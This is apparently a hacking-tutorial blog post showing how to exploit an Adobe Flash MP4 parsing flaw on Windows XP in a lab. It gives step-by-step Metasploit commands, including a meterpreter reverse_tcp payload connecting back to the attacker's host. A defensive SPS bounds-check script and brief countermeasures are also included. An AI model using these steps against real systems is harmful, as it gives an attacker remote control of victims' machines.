Hacking Tutorial Windows XP SP3 using Adobe Flash Player MP4 Vulnerability

Type : Tutorial

Level : Medium

Attacker O.S : Backtrack 5 R1

Victim O.S : Windows XP SP 3

Vulnerable Application : Adobe Flash Player

Exploit Credits : Alexander Gavrun, Abysssec, Sinn3r

This module exploits a vulnerability found in Adobe Flash Player's Flash10u.ocx component. When processing an MP4 file (specifically the Sequence Parameter Set), Flash checks whether pic_order_cnt_type is equal to 1, which sets the num_ref_frames_in_pic_order_cnt_cycle field, and then blindly copies the offset_for_ref_frame data onto the stack, which allows arbitrary remote code execution in the context of the user. Numerous reports also indicate that this vulnerability has been exploited in the wild.
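The bounds check that the description above says Flash lacks, written as a defender-side validator and added here as an educational example (not code from the Metasploit module, Adobe, or this post): it parses an H.264 SPS up to num_ref_frames_in_pic_order_cnt_cycle and flags a count beyond the 255 that the H.264 specification allows, which is the check a safe decoder performs before copying offset_for_ref_frame[] into a fixed-size buffer. It assumes a Baseline/Main/Extended-profile SPS RBSP with the NAL header and emulation-prevention bytes already stripped; build_sps and _ue are helpers that construct sample SPS data.

```python
"""Check an H.264 SPS for an oversized num_ref_frames_in_pic_order_cnt_cycle, the
count the Flash bug above copies blindly. Added example, not Adobe/Metasploit code."""

MAX_POC_CYCLE = 255  # H.264 7.4.2.1.1 bounds the count to 0..255


class BitReader:
    """Big-endian bit reader with unsigned Exp-Golomb (ue(v)) decoding."""
    def __init__(self, data: bytes):
        self.bits, self.pos = "".join(f"{b:08b}" for b in data), 0

    def u(self, n: int) -> int:
        chunk = self.bits[self.pos:self.pos + n]
        if len(chunk) < n:
            raise ValueError("SPS truncated")
        self.pos += n
        return int(chunk, 2) if n else 0

    def ue(self) -> int:
        zeros = 0
        while self.u(1) == 0:  # u(1) raises at end of data, so this terminates
            zeros += 1
        return (1 << zeros) - 1 + self.u(zeros)


def check_sps(sps: bytes) -> dict:
    """Parse a Baseline/Main/Extended-profile SPS RBSP (NAL header and
    emulation-prevention bytes removed) up to the POC fields and judge the count."""
    r = BitReader(sps)
    profile_idc = r.u(8)
    if profile_idc not in (66, 77, 88):  # High profiles add chroma fields first
        raise ValueError(f"profile_idc {profile_idc} not handled here")
    r.u(8); r.u(8); r.ue(); r.ue()  # constraints, level_idc, sps_id, log2_max_frame_num
    poc_type, count = r.ue(), None  # pic_order_cnt_type
    if poc_type == 1:
        r.u(1); r.ue(); r.ue()      # always_zero flag, two se(v) offsets (bits only)
        count = r.ue()              # num_ref_frames_in_pic_order_cnt_cycle
    return {"poc_type": poc_type, "count": count,  # validate BEFORE copying entries
            "safe": count is None or count <= MAX_POC_CYCLE}


def _ue(v: int) -> str:  # Exp-Golomb encoder, used only to build constructed samples
    s = bin(v + 1)[2:]
    return "0" * (len(s) - 1) + s


def build_sps(poc_cycle_len: int) -> bytes:
    """Constructed Baseline SPS with pic_order_cnt_type=1, cut after the POC fields."""
    bits = f"{66:08b}{0:08b}{30:08b}" + _ue(0) + _ue(0) + _ue(1) + "0"
    bits += _ue(0) + _ue(0) + _ue(poc_cycle_len) + _ue(0) * poc_cycle_len + "1"
    bits += "0" * (-len(bits) % 8)  # rbsp_trailing_bits / byte alignment
    return bytes(int(bits[i:i + 8], 2) for i in range(0, len(bits), 8))
```

Running check_sps over the SPS NAL units extracted from a suspicious MP4 (avcC box) gives a quick triage signal: a count above 255 is never valid and marks the file as malformed.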

Please note that the exploit requires a SWF media player in order to trigger the bug, which currently isn't included in the framework. However, software such as the Longtail SWF Player is free for non-commercial use and is easily obtainable.

Requirements :

1. Vulnerable Adobe Flash Player (download link)

Mediafire.com

2. Adobe Flash sps Exploit

Mediafire.com

Step by Step :

1. Download the vulnerable Flash application and install it on the victim operating system (Windows XP SP3); also download the exploit from the mediafire.com link above. Copy the exploit into the Metasploit browser exploits directory:

cp adobe_flash_sps.rb /pentest/exploits/framework/modules/exploits/windows/browser/

2. Run Metasploit with the msfconsole command and use the exploit you added in step 1.

I'm still using meterpreter reverse_tcp as my favourite payload until now 😛

3. Use the show options command to view the available switches for this exploit and for the payload that you need to configure to perform this attack. In the picture below I only configure the basic things needed to make this exploit work.

Information :

set srvhost 192.168.1.5 --> IP address of the attacker machine that acts as the web server

set srvport 80 --> port the exploit web server listens on

set swf_player_uri http://www.jeroenwijering.com/embed/mediaplayer.swf --> the SWF media player used to trigger the bug

set uripath flashplayer --> makes the served URL more friendly

set lhost 192.168.1.5 --> IP address of the attacker host that handles the connect-back from the victim

set lport 443 --> port that receives the victim's connect-back

exploit --> start the server and serve the payload

4. After we run the exploit command, Metasploit starts the attacker web server and waits for a connection. The victim reaches it at the URL built from the settings described in step 3. The picture below was taken when the victim accessed the URL.

5. Yep, we're already interacting with the victim; as seen in step 4, the exploit tries to migrate its process into notepad.exe. Use sessions -i 1 to interact with active session number 1 (to view the list of active sessions, run the sessions -l command).

Pwn3D!! we're in 🙂

Countermeasures :

1. Update your Adobe Flash Player to the latest version.

2. Do not open a URL sent by someone you don't know (or even by someone you do know) if you don't know what it points to.

Hope you enjoyed 🙂

Blogger at hacking-tutorial.com. Love PHP, offensive security and web. Contact him at me[-at-]vishnuvalentino.com

Visit Website : http://www.vishnuvalentino.com

  • silent-hacker

    how to make update in metasploit please 🙂

    • v4L

      #silent-hacker
      use msfupdate command from your metasploit console.